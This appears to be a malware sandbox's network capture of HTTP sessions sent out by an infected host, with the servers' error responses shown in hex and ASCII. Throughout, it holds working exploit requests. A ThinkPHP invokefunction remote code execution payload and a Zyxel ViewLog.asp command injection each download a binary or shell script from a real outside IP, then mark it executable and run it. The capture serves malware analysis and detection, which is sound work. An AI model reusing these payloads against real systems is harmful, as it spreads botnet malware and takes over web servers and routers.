                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:28.837991953 CET3628INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:18:28 GMT
                                                              Date: Mon, 13 Nov 2023 21:18:28 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 34 62 30 66 37 34 38 26 23 34 36 3b 31 36 39 39 39 31 30 33 30 38 26 23 34 36 3b 31 62 34 61 32 38 33 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;a4b0f748&#46;1699910308&#46;1b4a283b</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              134192.168.2.234959495.217.21.23280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:28.558510065 CET3581OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:28.869422913 CET3628INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/plain; charset=utf-8
                                                              Connection: close
                                                              Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: 400 Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              135192.168.2.233742095.168.198.14580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:28.566627979 CET3582OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              136192.168.2.233699295.143.179.16380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:28.577984095 CET3582OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:28.908174038 CET3629INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:18:28 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              137192.168.2.233836895.0.187.23380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:28.616166115 CET3584OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:36.985930920 CET4667INHTTP/1.1 504 Gateway Timeout
                                                              Connection: close
                                                              Nov 13, 2023 22:18:37.189920902 CET4672INHTTP/1.1 504 Gateway Timeout
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              138192.168.2.235582494.122.89.2208080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:29.377171040 CET3700OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              139192.168.2.235972894.46.25.1588080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:29.699023008 CET3786OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:30.017030001 CET3810INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:29 GMT
                                                              Server: Apache
                                                              Accept-Ranges: bytes
                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: 0
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                              Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              14192.168.2.2351982112.125.221.10980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:01.529907942 CET439OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:01.844525099 CET538INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:17:07 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              140192.168.2.235945485.209.139.1048080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:29.720570087 CET3788OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:30.065671921 CET3825INHTTP/1.0 400 Bad Request
                                                              Server: squid/3.1.23
                                                              Mime-Version: 1.0
                                                              Date: Mon, 13 Nov 2023 20:54:55 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 3169
                                                              X-Squid-Error: ERR_INVALID_URL 0
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              141192.168.2.234220894.230.157.2278080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:30.042467117 CET3823OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:30.387789965 CET3839INHTTP/1.0 404 R
                                                              Content-Type: text/html
                                                              Data Raw: 4e 6f 20 43 47 49
                                                              Data Ascii: No CGI


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              142192.168.2.235433488.218.157.21980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:30.301440001 CET3832OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:30.643225908 CET3845INHTTP/1.0 400 Bad Request
                                                              Content-Type: text/html
                                                              Content-Length: 349
                                                              Connection: close
                                                              Date: Fri, 10 Aug 2018 00:40:50 GMT
                                                              Server: lighttpd/1.4.39
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>
                                                              Nov 13, 2023 22:18:30.825691938 CET3932INHTTP/1.0 400 Bad Request
                                                              Content-Type: text/html
                                                              Content-Length: 349
                                                              Connection: close
                                                              Date: Fri, 10 Aug 2018 00:40:50 GMT
                                                              Server: lighttpd/1.4.39
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
